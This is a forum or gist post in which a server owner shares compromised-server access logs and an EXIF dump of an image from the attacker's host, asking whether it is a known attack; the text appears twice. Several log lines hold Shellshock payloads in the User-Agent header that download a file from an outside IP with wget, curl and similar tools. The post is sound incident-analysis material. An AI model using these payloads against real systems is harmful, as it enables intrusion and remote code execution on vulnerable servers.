vishwakarma09/reply to david

## reply to david
Hi David,

My server was compromised a few days back. Would you like to take a look. Here are a few access logs:

120.25.200.39 - - [16/Jan/2016:21:00:18 +0000] "GET /cgi-sys/php5 HTTP/1.1" 404 467 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

120.25.200.39 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 471 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

120.25.200.39 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 404 472 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

66.249.74.94 - - [16/Jan/2016:21:05:05 +0000] "GET /robots.txt HTTP/1.1" 404 502 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.74.94 - - [16/Jan/2016:21:05:05 +0000] "GET /%C3%BCcretsiz-3d-sohbet.html HTTP/1.1" 404 515 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.74.92 - - [16/Jan/2016:21:05:06 +0000] "GET /bedava-olan-arkada%C5%9Fl%C4%B1k-siteleri.html HTTP/1.1" 404 530 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

66.249.74.94 - - [16/Jan/2016:22:50:24 +0000] "GET /t%C3%BCrk%C3%A7e-kameral%C4%B1-sohbet-bedava.html HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

185.130.5.209 - - [16/Jan/2016:23:03:38 +0000] "GET /xmlrpc.php HTTP/1.1" 404 446 "-" "-"

54.166.165.82 - - [17/Jan/2016:01:07:40 +0000] "HEAD / HTTP/1.1" 200 226 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"

66.249.74.94 - - [17/Jan/2016:04:20:41 +0000] "GET /t%C3%BCrk%C3%A7e-kameral%C4%B1-sohbet-bedava.html HTTP/1.1" 404 529 "-" "Mozilla/5.0 (iPhone;

So, when I decided to dig in. I picked an jpg file from the above server. The original file http://204.232.209.188/images/freshcafe/slice_30_192.png has been removed. I picked another from server root http://204.232.209.188/images/earlybird.jpg

Then I opened this file in exif editor (used this http://www.programosy.pl/program,exifeditor.html)  Here are the contents:

<?xml version="1.0" encoding="Windows-1252"?>

<!--EXIF export from photoC:\Users\Rajesh\Desktop\dddd.xml by EXIFeditor-->

<ExifEditor>

<file filename="C:\Users\Rajesh\Desktop\earlybird.jpg">

<Tag ID="20736" Type="4" Name="FrameDelay" Value="0" />

<Tag ID="20737" Type="3" Name="LoopCount" Value="1" />

<Tag ID="20738" Type="1" Name="" Value="?????y??QTG)?l;$&#x1B;&#x14;&#x16;&#x5;&#x4;J)&amp;??e???ugD??R83#%&#x4;&#x6;E&#x16;&#x16;2*&#x19;5&#x6;&#xA;f&quot;!&#x15;&#x13;&#xB;??d??\C:&quot;?44??Y??J6&#x19;&#x15;??bKB'??a??R??[?????i??QD&#x8;&#xC;YR6?64c&#x10;&#x13;t&#x18;&#x19;&#x1A;&#x18;&#xE;?BB????rBW&#xC;&#x10;?{D?????L??[TL2??Mz&#x19;&#x1B;??RH&#xC;&#x10;??ZX! j&#x12;&#x14;91&#x1B;??\[&#x10;&#x13;?{J?uB?kk)% aR1IF2??lkY2?mB{e:??q+!&#x19;??cq]4??mm &#x1E;??`dR+?+)4' ??T??e?sK?+)?yDk&#x19;&#x1A;??J??Ysa9&#xC;&#xA;&#x7;s&quot;!R&#x10;&#x12;&quot;&#x1F;&#x11;?+(g\D?xS	&#x8;&#x4;t&#x1C;&#x1E;{&quot; ??fk\9??n	&#x3;&#x2;l&#x14;&#x17;*&quot;&#x14;c&#x1A;&#x1B;?{kP&#x1A;&#x1A;?0-+)&#x1A;{34?}J??UF&quot;&#x1E;[&#x1B;&#x1B;:&#xB;&#xF;??W??r?????acZ;?}Pr&#x14;&#x18;??i&#x3;&#x2;&#x1;?????g?yL??bmaB??Y?!!?uI|))zb4i;??^??z??x?($#&quot;&#x18;ZSGc&#x14;&#x15;?($?SU??Nr**?qB??\q&#x14;&#x14;|($?&lt;&gt;[&#x14;&#x17;!&#x17;&#xF;?0.??FtjWyrdP&#xB;&#xE;R&#x13;&#x17;ta4??aaU7hU0??U??ijbV?????aU&#x1C;&#x1D;^L)?,-|nHz0-?}F?$&quot;la:??keY3,(&#x14;r($'&#xB;&#xD;??f??My,.rV???&#xF;&#x10;	qZ-:9+??]??r&#x1B;&#x1C;&#x12;B=-?uI[O-??M??Q..#{$$&#x16;&#xC;&#xC;?&#x1C;&#x1B;a./e))P@ r&#x18;&#x14;?$%?????iQ&#x18;&#x14;q$*]&#xC;&#x10;\00'&#x1F;&#xF;0&#x10;&#x10;z&#x18;&#x14; &#x1C;l&#x19;&#x14;#'&#x1D;l-,Y&#x18;&#x18;?-2[))??a??i??h??a&#x4;&#x8;&#x4;??m&#xF;&#x10;&#x10;??e??i&#xC;&#xC;&#xD;??f??m??Y??^??i??g?yE??u??U^M1??V~&#x1C; ?????Qe&#x18;&#x14;??o&#x4;&#x7;&#x8;&#xC;&#x4;&#x4;v&#x14;&#x14;?yM???0$&#x12;???AA1" />

<Tag ID="20739" Type="1" Name="" Value="" />

<Tag ID="20625" Type="3" Name="ChrominanceTable" Value="2" />

<Tag ID="20624" Type="3" Name="LuminanceTable" Value="2" />

</file>

</ExifEditor>

Do you think this is such an attack?
	Hi David,

	My server was compromised a few days back. Would you like to take a look. Here are a few access logs:

	120.25.200.39 - - [16/Jan/2016:21:00:18 +0000] "GET /cgi-sys/php5 HTTP/1.1" 404 467 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

	120.25.200.39 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 471 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

	120.25.200.39 - - [16/Jan/2016:21:00:19 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 404 472 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

	66.249.74.94 - - [16/Jan/2016:21:05:05 +0000] "GET /robots.txt HTTP/1.1" 404 502 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

	66.249.74.94 - - [16/Jan/2016:21:05:05 +0000] "GET /%C3%BCcretsiz-3d-sohbet.html HTTP/1.1" 404 515 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

	66.249.74.92 - - [16/Jan/2016:21:05:06 +0000] "GET /bedava-olan-arkada%C5%9Fl%C4%B1k-siteleri.html HTTP/1.1" 404 530 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

	66.249.74.94 - - [16/Jan/2016:22:50:24 +0000] "GET /t%C3%BCrk%C3%A7e-kameral%C4%B1-sohbet-bedava.html HTTP/1.1" 404 529 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

	185.130.5.209 - - [16/Jan/2016:23:03:38 +0000] "GET /xmlrpc.php HTTP/1.1" 404 446 "-" "-"

	54.166.165.82 - - [17/Jan/2016:01:07:40 +0000] "HEAD / HTTP/1.1" 200 226 "-" "Cloud mapping experiment. Contact research@pdrlabs.net"

	66.249.74.94 - - [17/Jan/2016:04:20:41 +0000] "GET /t%C3%BCrk%C3%A7e-kameral%C4%B1-sohbet-bedava.html HTTP/1.1" 404 529 "-" "Mozilla/5.0 (iPhone;

	So, when I decided to dig in. I picked an jpg file from the above server. The original file http://204.232.209.188/images/freshcafe/slice_30_192.png has been removed. I picked another from server root http://204.232.209.188/images/earlybird.jpg

	Then I opened this file in exif editor (used this http://www.programosy.pl/program,exifeditor.html) Here are the contents:

	<?xml version="1.0" encoding="Windows-1252"?>

	<!--EXIF export from photoC:\Users\Rajesh\Desktop\dddd.xml by EXIFeditor-->

	<ExifEditor>

	<file filename="C:\Users\Rajesh\Desktop\earlybird.jpg">

	<Tag ID="20736" Type="4" Name="FrameDelay" Value="0" />

	<Tag ID="20737" Type="3" Name="LoopCount" Value="1" />

	<Tag ID="20738" Type="1" Name="" Value="?????y??QTG)?l;$J)&??e???ugD??R83#%E25 f"!??d??\C:"?44??Y??J6??bKB'??a??R??[?????i??QDYR6?64ct?BB????rBW?{D?????L??[TL2??Mz??RH??ZX! j91??\[?{J?uB?kk)% aR1IF2??lkY2?mB{e:??q+!??cq]4??mm ??`dR+?+)4' ??T??e?sK?+)?yDk??J??Ysa9 s"!R"?+(g\D?xS t{" ??fk\9??n l"c?{kP?0-+){34?}J??UF"[:??W??r?????acZ;?}Pr??i?????g?yL??bmaB??Y?!!?uI\|))zb4i;??^??z??x?($#"ZSGc?($?SU??Nr*?qB??\q\|($?<>[!?0.??FtjWyrdPRta4??aaU7hU0??U??ijbV?????aU^L)?,-\|nHz0-?}F?$"la:??keY3,(r($' ??f??My,.rV??? qZ-:9+??]??rB=-?uI[O-??M??Q..#{$$?a./e))P@ r?$%?????iQq$]\00'0z l#'l-,Y?-2[))??a??i??h??a??m??e??i ??f??m??Y??^??i??g?yE??u??U^M1??V~ ?????Qe??ov?yM???0$???AA1" />

	<Tag ID="20739" Type="1" Name="" Value="" />

	<Tag ID="20625" Type="3" Name="ChrominanceTable" Value="2" />

	<Tag ID="20624" Type="3" Name="LuminanceTable" Value="2" />

	</file>

	</ExifEditor>

	Do you think this is such an attack?